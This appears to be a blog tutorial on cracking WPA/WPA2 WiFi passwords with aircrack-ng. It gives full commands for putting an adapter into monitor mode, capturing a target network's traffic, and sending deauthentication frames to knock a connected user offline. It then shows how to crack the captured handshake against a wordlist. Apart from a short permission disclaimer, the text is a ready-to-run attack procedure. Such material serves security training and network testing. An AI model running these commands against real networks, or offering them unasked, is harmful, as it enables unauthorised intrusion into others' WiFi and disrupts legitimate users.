APT 96

About Me Server Info Projects Blog Gallery OSINT Tools RSS Feed

Breaking WPA/WPA2 WiFi Passwords With Aircrack

For educational purposes only. Do not use aircrack unless you have the permission of the network owner

In this exercise we are going to try and crack the password of a WiFi access point. We will cover

Identifying The Target Network

To start with, put your WiFi adapter into monitor mode by opening a terminal and typing

airmon-ng start wlx123456789

Replace wlx123456789 with the name of your adapter. If you aren’t sure what this is type iwconfig. When you run the airmon-ng start command, the adapter will typically be renamed to something like wlan0mon but if it is called something else then just use that name instead in the following commands. Next enter the command

airodump-ng wlan0mon

This should bring up a table similar to the one below on your terminal. It will show us a list of all nearby WiFi access points and, among other things, their BSSID and the channel they are operating on.

A1:23:B1:45:C1:67 -70 3 2 0 6 130 WPA2 CCMPP PSK EE-TestNetwork  

Capturing Traffic To And From The Network

We can see our target network (EE-TestNetwork) and its MAC address, as well as the fact it’s using channel 6. We’re going to instruct our wifi adapter to start monitoring and logging all traffic to and from that network.

airodump-ng --write /home/kali/Desktop/EE-TestCaptureFile --bssid A1:23:B1:45:C1:67 --channel 6 wlan0mon

After doing this, you should now see an output similar to before, but with additional information about users currently connected to that access point

A1:23:B1:45:C1:67 -70 3 2 0 6 130 WPA2 CCMPP PSK EE-TestNetwork  
BSSID STATION PWR Rate Lost Frames Notes Probes
A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 -40 0e- 4e 0 40000    

This means there is one user currently connected to our target network, and his device has the MAC address D3:55:F1:AF:34:99

Deauth/Jamming Attack (Optional)

So far we have identified our target network and started monitoring all traffic to and from the network. In order to crack the WiFi password we need to capture the WPA handshake. This handshake is only broadcasted when a user is in the process of connecting to the network but as we can see, the user on our target network is already connected. We have a couple of options here, and below is a brief info box discussing the differences between them.

  1. We can simply wait for a legitimate user to connect at which point you will see a notice in the top right of your terminal saying “WPA Handshake”. If you are doing this, then skip to the next step

  2. We can launch a deauth attack, which will attempt to jam the legitimate user offline. When he reconnects, we’ll capture the handshake.

Passive V Active Attacks
Waiting patiently for a legitimate user to connect is known as a passive attack. It is completely undetectable but there's no telling how long you could wait for a user to connect. It could be hours, even days.

Deauth/jamming is an active attack. If you are successful you should capture a WPA handshake within seconds. But an attack like this is highly detectable and leaves logs in the target network showing a deauth attack has occurred.

If you are choosing an active attack, then in order to start jamming the legitimate user, open a new terminal and enter the following

aireplay-ng -0 1 -a A1:23:B1:45:C1:67 -c D3:55:F1:AF:34:99 wlan0mon
  • -0 is the command to send de-authentication frames
  • 1 is the number of de-auth frames to send. Enter 0 to send them continously
  • -a A1:23:B1:45:C1:67is the MAC address of the target WiFi AP.
  • -c D3:55:F1:AF:34:99 is the MAC address of the client you want to deauthenticate. If you omit this, all clients will be deauthenticated
  • wlan0mon is the interface name

If this is successful, you should see a notice in the top right of the first terminal saying “WPA handshake”. This means we have captured the handshake and can now attempt to crack the password.

Cracking The WPA Password

We have now captured the WPA handshake. When we started logging traffic to and from the network, Airodump created a few new files for us on the desktop. The one we need is the .cap file.

Run the following command (If your wordlist is in a different directory then use that instead)

aircrack-ng /home/kali/Desktop/EE-TestCaptureFile.cap -w /home/kali/Desktop/wordlist.txt

This will try every word in our wordlist against the WPA handshake. If the WiFi network is using a password in our wordlist, it will soon display on the terminal.